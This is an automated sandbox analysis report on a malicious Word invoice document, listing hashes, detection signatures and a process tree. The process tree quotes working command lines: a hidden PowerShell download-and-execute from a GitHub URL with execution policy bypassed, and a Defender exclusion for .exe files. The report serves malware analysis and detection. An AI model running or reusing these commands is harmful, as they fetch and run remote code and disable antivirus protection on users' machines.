Loading ...

Play interactive tourEdit tour

Windows Analysis Report invoice_16214089.doc

Overview

General Information

Sample Name:invoice_16214089.doc
Analysis ID:545659
MD5:ddce8f154d1d9b9f46544d05807c8fdb
SHA1:916a36b0bffa682aa9656a764b70a76d4b2ce265
SHA256:ccac6a6acb12bac68c005edf834739a568027bc02c36a7cc039b8326b9510ec4
Tags:doc
Infos:

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Sigma detected: Suspicious Script Execution From Temp Folder
Wscript starts Powershell (via cmd or directly)
Writes or reads registry keys via WMI
Sigma detected: Change PowerShell Policies to a Unsecure Level
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: WScript or CScript Dropper
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded VBA macro which may execute processes
Bypasses PowerShell execution policy
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Tries to download and execute files (via powershell)
Sigma detected: Suspicius Add Task From User AppData Temp
Suspicious powershell command line found
Microsoft Office drops suspicious files
Sigma detected: Powershell Defender Exclusion
Document contains an embedded VBA macro with suspicious strings
.NET source code contains very large strings
Machine Learning detection for dropped file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Binary contains a suspicious time stamp
PE file contains more sections than normal
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Sigma detected: PowerShell Script Run in AppData
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Stores large binary data to the registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Enables debug privileges
Document contains no OLE stream with summary information
Sigma detected: PowerShell Download from URL
Detected TCP or UDP traffic on non-standard ports
Document contains embedded VBA macros
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Potential document exploit detected (performs HTTP gets)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 892 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • wscript.exe (PID: 1212 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\putty.vbs" MD5: 045451FA238A75305CC26AC982472367)
      • cmd.exe (PID: 2672 cmdline: "C:\Windows\System32\cmd.exe" /c Powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('https://github.com/Bagir123/AHTuKuKeP/raw/main/BvplycojPlNnhkhIApYVbFZYCJTgYiMu.exe','C:\Users\user\AppData\Local\Temp\putty.exe'); Start-Process C:\Users\user\AppData\Local\Temp\putty.exe -ArgumentList 'BvplycojPlNnhkhIApYVbFZYCJTgYiMu'; MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 2800 cmdline: Powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('https://github.com/Bagir123/AHTuKuKeP/raw/main/BvplycojPlNnhkhIApYVbFZYCJTgYiMu.exe','C:\Users\user\AppData\Local\Temp\putty.exe'); Start-Process C:\Users\user\AppData\Local\Temp\putty.exe -ArgumentList 'BvplycojPlNnhkhIApYVbFZYCJTgYiMu'; MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • putty.exe (PID: 2996 cmdline: "C:\Users\user\AppData\Local\Temp\putty.exe" BvplycojPlNnhkhIApYVbFZYCJTgYiMu MD5: 707C489D66A1C6C72A58ECF13270664B)
            • cmd.exe (PID: 1516 cmdline: "C:\windows\system32\cmd.exe" /C powershell.exe -command Add-MpPreference -ExclusionExtension exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)